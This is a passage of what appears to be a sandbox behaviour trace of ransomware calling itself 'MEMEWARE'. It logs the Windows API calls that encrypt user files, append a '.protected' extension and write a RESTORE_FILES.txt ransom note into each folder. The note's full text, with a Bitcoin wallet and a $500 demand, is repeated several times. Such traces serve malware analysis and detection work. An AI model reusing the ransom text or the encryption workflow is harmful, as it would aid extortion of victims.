service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0084.761] WriteFile (in: hFile=0xd8, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295ea24*=0x53d, lpOverlapped=0x0) returned 1 [0084.762] lstrlenA (lpString="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") returned 684 [0084.762] WriteFile (in: hFile=0xd8, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0x447448*, 
lpNumberOfBytesWritten=0x295ea24*=0x2ac, lpOverlapped=0x0) returned 1 [0084.762] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0084.763] WriteFile (in: hFile=0xd8, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295ea24*=0xb1, lpOverlapped=0x0) returned 1 [0084.763] CloseHandle (hObject=0xd8) returned 1 [0084.763] FindNextFileW (in: hFindFile=0x47ba10, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 1 [0084.763] lstrcmpiW (lpString1="IMJP8_1", lpString2="Windows") returned -1 [0084.763] lstrcmpiW (lpString1="IMJP8_1", lpString2="Program Files") returned -1 [0084.763] lstrcmpiW (lpString1="IMJP8_1", lpString2="Program Files (x86)") returned -1 [0084.763] lstrcmpiW (lpString1="IMJP8_1", lpString2="$Recycle.bin") returned 1 [0084.763] lstrcmpiW (lpString1="IMJP8_1", lpString2="System Volume Information") returned -1 [0084.763] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\IMJP8_1") returned 65 [0084.763] lstrcmpW (lpString1="IMJP8_1", lpString2=".") returned 1 [0084.763] lstrcmpW (lpString1="IMJP8_1", lpString2="..") returned 1 [0084.763] wnsprintfW (in: pszDest=0x504c48, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\IMJP8_1\\*") returned 67 [0084.763] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\IMJP8_1\\*", lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 0x47ba50 [0084.766] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0084.766] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0084.766] lstrcmpiW 
(lpString1=".", lpString2="Program Files (x86)") returned -1 [0084.766] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0084.766] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0084.766] wnsprintfW (in: pszDest=0x504c48, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\IMJP8_1\\.") returned 67 [0084.766] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0084.766] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 1 [0084.766] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0084.767] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0084.767] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0084.767] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0084.767] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0084.767] wnsprintfW (in: pszDest=0x504c48, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\IMJP8_1\\..") returned 68 [0084.767] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0084.767] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0084.767] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 0 [0084.767] FindClose (in: hFindFile=0x47ba50 | out: hFindFile=0x47ba50) returned 1 [0084.767] wnsprintfW (in: pszDest=0x504c48, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\IMJP8_1\\RESTORE_FILES.txt") returned 83 [0084.767] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\IMJP8_1\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\imjp8_1\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, 
lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xd8 [0084.767] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0084.767] WriteFile (in: hFile=0xd8, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295ea24*=0x53d, lpOverlapped=0x0) returned 1 [0084.768] lstrlenA (lpString="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") returned 684 [0084.768] WriteFile (in: hFile=0xd8, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, 
lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295ea24*=0x2ac, lpOverlapped=0x0) returned 1 [0084.768] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0084.768] WriteFile (in: hFile=0xd8, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295ea24*=0xb1, lpOverlapped=0x0) returned 1 [0084.768] CloseHandle (hObject=0xd8) returned 1 [0084.769] FindNextFileW (in: hFindFile=0x47ba10, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 1 [0084.769] lstrcmpiW (lpString1="IMJP9_0", lpString2="Windows") returned -1 [0084.769] lstrcmpiW (lpString1="IMJP9_0", lpString2="Program Files") returned -1 [0084.769] lstrcmpiW (lpString1="IMJP9_0", lpString2="Program Files (x86)") returned -1 [0084.769] lstrcmpiW (lpString1="IMJP9_0", lpString2="$Recycle.bin") returned 1 [0084.769] lstrcmpiW (lpString1="IMJP9_0", lpString2="System Volume Information") returned -1 [0084.769] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\IMJP9_0") returned 65 [0084.769] lstrcmpW (lpString1="IMJP9_0", lpString2=".") returned 1 [0084.769] lstrcmpW (lpString1="IMJP9_0", lpString2="..") returned 1 [0084.769] wnsprintfW (in: pszDest=0x504c48, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\IMJP9_0\\*") returned 67 [0084.769] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\IMJP9_0\\*", lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 0x47ba50 [0084.769] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0084.769] lstrcmpiW 
(lpString1=".", lpString2="Program Files") returned -1 [0084.769] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0084.769] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0084.769] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0084.769] wnsprintfW (in: pszDest=0x504c48, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\IMJP9_0\\.") returned 67 [0084.769] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0084.770] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 1 [0084.770] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0084.770] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0084.770] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0084.770] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0084.770] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0084.770] wnsprintfW (in: pszDest=0x504c48, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\IMJP9_0\\..") returned 68 [0084.770] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0084.770] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0084.770] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 0 [0084.770] FindClose (in: hFindFile=0x47ba50 | out: hFindFile=0x47ba50) returned 1 [0084.770] wnsprintfW (in: pszDest=0x504c48, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\IMJP9_0\\RESTORE_FILES.txt") returned 83 [0084.770] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\IMJP9_0\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js 
halpmcxz\\appdata\\local\\microsoft\\imjp9_0\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xd8 [0084.770] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0084.770] WriteFile (in: hFile=0xd8, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295ea24*=0x53d, lpOverlapped=0x0) returned 1 [0084.771] lstrlenA (lpString="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") 
returned 684 [0084.771] WriteFile (in: hFile=0xd8, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295ea24*=0x2ac, lpOverlapped=0x0) returned 1 [0084.771] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0084.771] WriteFile (in: hFile=0xd8, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295ea24*=0xb1, lpOverlapped=0x0) returned 1 [0084.771] CloseHandle (hObject=0xd8) returned 1 [0084.771] FindNextFileW (in: hFindFile=0x47ba10, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 1 [0084.772] lstrcmpiW (lpString1="Internet Explorer", lpString2="Windows") returned -1 [0084.772] lstrcmpiW (lpString1="Internet Explorer", lpString2="Program Files") returned -1 [0084.772] lstrcmpiW (lpString1="Internet Explorer", lpString2="Program Files (x86)") returned -1 [0084.772] lstrcmpiW (lpString1="Internet Explorer", lpString2="$Recycle.bin") returned 1 [0084.772] lstrcmpiW (lpString1="Internet Explorer", lpString2="System Volume Information") returned -1 [0084.772] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Internet Explorer") returned 75 [0084.772] lstrcmpW (lpString1="Internet Explorer", lpString2=".") returned 1 [0084.772] lstrcmpW (lpString1="Internet Explorer", lpString2="..") returned 1 [0084.772] wnsprintfW (in: pszDest=0x504c48, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Internet Explorer\\*") returned 77 [0084.772] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS 
HALPmcxz\\AppData\\Local\\Microsoft\\Internet Explorer\\*", lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 0x47ba50 [0084.781] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0084.781] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0084.781] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0084.781] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0084.781] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0084.781] wnsprintfW (in: pszDest=0x504c48, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Internet Explorer\\.") returned 77 [0084.781] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0084.781] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 1 [0084.781] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0084.781] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0084.781] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0084.781] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0084.781] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0084.781] wnsprintfW (in: pszDest=0x504c48, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Internet Explorer\\..") returned 78 [0084.781] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0084.781] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0084.781] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 1 [0084.781] lstrcmpiW (lpString1="brndlog.bak", lpString2="Windows") returned -1 [0084.781] lstrcmpiW (lpString1="brndlog.bak", lpString2="Program Files") returned -1 [0084.781] lstrcmpiW (lpString1="brndlog.bak", lpString2="Program Files (x86)") returned -1 
[0084.781] lstrcmpiW (lpString1="brndlog.bak", lpString2="$Recycle.bin") returned 1 [0084.781] lstrcmpiW (lpString1="brndlog.bak", lpString2="System Volume Information") returned -1 [0084.781] wnsprintfW (in: pszDest=0x504c48, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Internet Explorer\\brndlog.bak") returned 87 [0084.781] StrStrIW (lpFirst="brndlog.bak", lpSrch=".protected") returned 0x0 [0084.781] lstrcmpW (lpString1="brndlog.bak", lpString2="RESTORE_FILES.txt") returned -1 [0084.781] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e9dc | out: pbBuffer=0x295e9dc) returned 1 [0084.782] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295ea04*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295ea04*=0x30) returned 1 [0084.782] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Internet Explorer\\brndlog.bak" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\internet explorer\\brndlog.bak"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x14c [0084.782] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Internet Explorer\\brndlog.bak") returned 87 [0084.782] StrStrW (lpFirst="brndlog.bak", lpSrch=".txt") returned 0x0 [0084.782] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Internet Explorer\\brndlog.bak") returned 87 [0084.782] StrStrW (lpFirst="brndlog.bak", lpSrch=".rar") returned 0x0 [0084.782] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Internet Explorer\\brndlog.bak") returned 87 [0084.782] StrStrW (lpFirst="brndlog.bak", lpSrch=".zip") returned 0x0 [0084.782] ReadFile (in: hFile=0x14c, lpBuffer=0x4a1458, nNumberOfBytesToRead=0x2800, 
lpNumberOfBytesRead=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesRead=0x295ea24*=0x2800, lpOverlapped=0x0) returned 1 [0084.784] SetFilePointerEx (in: hFile=0x14c, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0084.784] WriteFile (in: hFile=0x14c, lpBuffer=0x4a1458*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesWritten=0x295ea24*=0x2800, lpOverlapped=0x0) returned 1 [0084.784] SetFilePointerEx (in: hFile=0x14c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0084.784] WriteFile (in: hFile=0x14c, lpBuffer=0x295e9fc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0x295e9fc*, lpNumberOfBytesWritten=0x295ea24*=0x4, lpOverlapped=0x0) returned 1 [0084.784] WriteFile (in: hFile=0x14c, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295ea24*=0x30, lpOverlapped=0x0) returned 1 [0084.784] CloseHandle (hObject=0x14c) returned 1 [0084.784] wnsprintfW (in: pszDest=0x514c90, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Internet Explorer\\brndlog.bak.protected") returned 97 [0084.785] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Internet Explorer\\brndlog.bak" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\internet explorer\\brndlog.bak"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Internet Explorer\\brndlog.bak.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\internet explorer\\brndlog.bak.protected")) returned 1 [0084.785] FindNextFileW (in: hFindFile=0x47ba50, 
lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 1 [0084.785] lstrcmpiW (lpString1="brndlog.txt", lpString2="Windows") returned -1 [0084.785] lstrcmpiW (lpString1="brndlog.txt", lpString2="Program Files") returned -1 [0084.785] lstrcmpiW (lpString1="brndlog.txt", lpString2="Program Files (x86)") returned -1 [0084.785] lstrcmpiW (lpString1="brndlog.txt", lpString2="$Recycle.bin") returned 1 [0084.785] lstrcmpiW (lpString1="brndlog.txt", lpString2="System Volume Information") returned -1 [0084.785] wnsprintfW (in: pszDest=0x504c48, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Internet Explorer\\brndlog.txt") returned 87 [0084.785] StrStrIW (lpFirst="brndlog.txt", lpSrch=".protected") returned 0x0 [0084.785] lstrcmpW (lpString1="brndlog.txt", lpString2="RESTORE_FILES.txt") returned -1 [0084.785] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e9dc | out: pbBuffer=0x295e9dc) returned 1 [0084.786] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295ea04*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295ea04*=0x30) returned 1 [0084.786] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Internet Explorer\\brndlog.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\internet explorer\\brndlog.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x14c [0084.786] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Internet Explorer\\brndlog.txt") returned 87 [0084.786] StrStrW (lpFirst="brndlog.txt", lpSrch=".txt") returned=".txt" [0084.786] lstrlenW (lpString=".txt") returned 4 [0084.786] lstrlenW (lpString=".txt") returned 4 [0084.787] ReadFile (in: hFile=0x14c, lpBuffer=0x4a1458, nNumberOfBytesToRead=0x2800, 
lpNumberOfBytesRead=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesRead=0x295ea24*=0x2800, lpOverlapped=0x0) returned 1 [0084.799] SetFilePointerEx (in: hFile=0x14c, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0084.799] WriteFile (in: hFile=0x14c, lpBuffer=0x4a1458*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesWritten=0x295ea24*=0x2800, lpOverlapped=0x0) returned 1 [0084.799] ReadFile (in: hFile=0x14c, lpBuffer=0x4a1458, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesRead=0x295ea24*=0x7b0, lpOverlapped=0x0) returned 1 [0084.799] SetFilePointerEx (in: hFile=0x14c, liDistanceToMove=0xfffff850, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0084.799] WriteFile (in: hFile=0x14c, lpBuffer=0x4a1458*, nNumberOfBytesToWrite=0x7b0, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesWritten=0x295ea24*=0x7b0, lpOverlapped=0x0) returned 1 [0084.799] SetFilePointerEx (in: hFile=0x14c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0084.799] WriteFile (in: hFile=0x14c, lpBuffer=0x295e9fc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0x295e9fc*, lpNumberOfBytesWritten=0x295ea24*=0x4, lpOverlapped=0x0) returned 1 [0084.800] WriteFile (in: hFile=0x14c, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295ea24*=0x30, lpOverlapped=0x0) returned 1 [0084.800] CloseHandle (hObject=0x14c) returned 1 [0084.800] wnsprintfW (in: pszDest=0x514c90, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS 
HALPmcxz\\AppData\\Local\\Microsoft\\Internet Explorer\\brndlog.txt.protected") returned 97 [0084.800] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Internet Explorer\\brndlog.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\internet explorer\\brndlog.txt"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Internet Explorer\\brndlog.txt.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\internet explorer\\brndlog.txt.protected")) returned 1 [0084.800] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 1 [0084.800] lstrcmpiW (lpString1="DOMStore", lpString2="Windows") returned -1 [0084.800] lstrcmpiW (lpString1="DOMStore", lpString2="Program Files") returned -1 [0084.800] lstrcmpiW (lpString1="DOMStore", lpString2="Program Files (x86)") returned -1 [0084.801] lstrcmpiW (lpString1="DOMStore", lpString2="$Recycle.bin") returned 1 [0084.801] lstrcmpiW (lpString1="DOMStore", lpString2="System Volume Information") returned -1 [0084.801] wnsprintfW (in: pszDest=0x504c48, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Internet Explorer\\DOMStore") returned 84 [0084.801] lstrcmpW (lpString1="DOMStore", lpString2=".") returned 1 [0084.801] lstrcmpW (lpString1="DOMStore", lpString2="..") returned 1 [0084.801] wnsprintfW (in: pszDest=0x514c90, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Internet Explorer\\DOMStore\\*") returned 86 [0084.801] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Internet Explorer\\DOMStore\\*", lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 